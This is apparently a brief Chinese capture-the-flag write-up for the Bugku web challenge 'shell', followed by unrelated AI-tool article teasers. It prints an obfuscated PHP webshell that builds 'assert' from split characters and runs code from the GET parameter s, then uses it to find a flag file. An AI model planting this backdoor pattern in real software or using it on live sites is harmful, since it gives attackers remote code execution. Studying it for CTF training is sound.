Bugku-web(shell,成绩查询)

Bugku-web(shell,成绩查询)

WriteUp1

题目信息

解题思路

打开页面,发现一片空白

观察题目中的描述

$poc="a#s#s#e#r#t";  # 定义一串字符串 $poc_1=explode("#",$poc); # explode() 按照 # 分割上面字符串,留下 ["a","s","s","e","r","t"] $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; # 拼接后 assert $poc_2($_GET['s']) # assert($_GET['s'])

看到是get请求,说明可以在url中传递参数s

得到

分别为flaga15808abee46a1d5.txt和index.php

直接查看flaga15808abee46a1d5.txt即可

得到

Read more

idea中如何使用Trae AI插件,并举例说明

idea中如何使用Trae AI插件,并举例说明

Trae AI 是字节跳动推出的 AI 编程助手,在 IntelliJ IDEA 中通过插件形式提供智能代码补全、代码生成、代码解释、单元测试生成等功能,支持 Java、Python、Go、JavaScript 等多种语言。   一、安装与配置 1. 安装插件 在 IDEA 中打开插件市场(File → Settings → Plugins),搜索 “Trae AI” 或 “Trae Code AI”,点击 Install 安装,重启 IDEA 生效。 2. 配置模型 首次使用需配置 AI 模型: * 打开 File → Settings → Tools

让“小爱音箱PRO”智能起来:接入豆包AI

下面提供从 0 到 1 的完整流程,包含豆包 API 申请、MiGPT 部署、配置与使用,确保你能顺利让小爱音箱 Pro 用上豆包的强大能力。 一、准备工作(必做) 二、申请豆包 API 密钥(关键步骤) 豆包 API 需通过火山引擎方舟平台申请,以下是详细步骤: 1. 注册与实名认证 1. 访问火山引擎官网:https://www.volcengine.com/ 2. 注册账号并完成实名认证(个人 / 企业均可) 3. 登录后进入方舟大模型平台 2. 创建 API 密钥与推理接入点 1. 进入控制台 → API 密钥管理 → 点击 "

本地AI自由!OpenClaw + Ollama 全离线部署实战手册 (Windows版)

厌倦了云端AI的Token计费焦虑和隐私泄露风险?想拥有一位完全听命于你的本地AI助手?本文将手把手教你,无需深厚编程基础,只需跟随步骤执行命令,即可在个人电脑上搭建属于你的全功能AI Agent。 核心优势:零费用:无需API Key,彻底告别按量付费。强隐私:数据全程本地处理,断网也能流畅使用。高自由:随心切换Qwen、GLM等顶尖开源模型。 ️ 第一阶段:环境准备(地基搭建) 在开始之前,请以管理员身份打开 PowerShell (按下 Win + X 选择)。这是我们接下来的操作中心。 1. 安装 Node.js (v18+) Node.js 是 OpenClaw 的运行环境,安装它时 npm 会自动就位。 1. 访问 Node.js 官网,下载 LTS (长期支持)

Trae CN、Lingma IDE、Cursor 三种AI开发IDE深度对比

一、概述 这三款AI原生IDE代表了新一代智能开发工具的发展方向,相较于传统IDE(如VS Code、IDEA),它们在代码生成、上下文理解和协同开发等方面有显著突破。以下从技术架构、使用场景和本土化适配等维度进行对比。 二、发展背景 工具开发团队发布时间核心定位Trae CN字节跳动2024年Q1中文优化最好的AI编程助手Lingma IDE阿里云2025年5月企业级AI原生开发环境Cursor美国Anysphere团队2022年深度代码理解的全球化IDE 三、核心技术对比 1. AI引擎架构 2. 技术栈差异 工具编辑器内核AI集成方式数据流向Trae CNVS Code Mod云端轮询可选国内服务器LingmaOpenVSX定制阿里云PAI直连完全国内闭环CursorRust重写核心本地+云混合默认境外服务器 四、性能实测数据 (基于相同硬件:i7-13700H/32GB RAM) 测试项Trae CNLingmaCursor代码生成响应时间2.3s1.8s1.2s10万行项目加载速度9.2s6.8s4.5s中文注释理解准确率92%88%7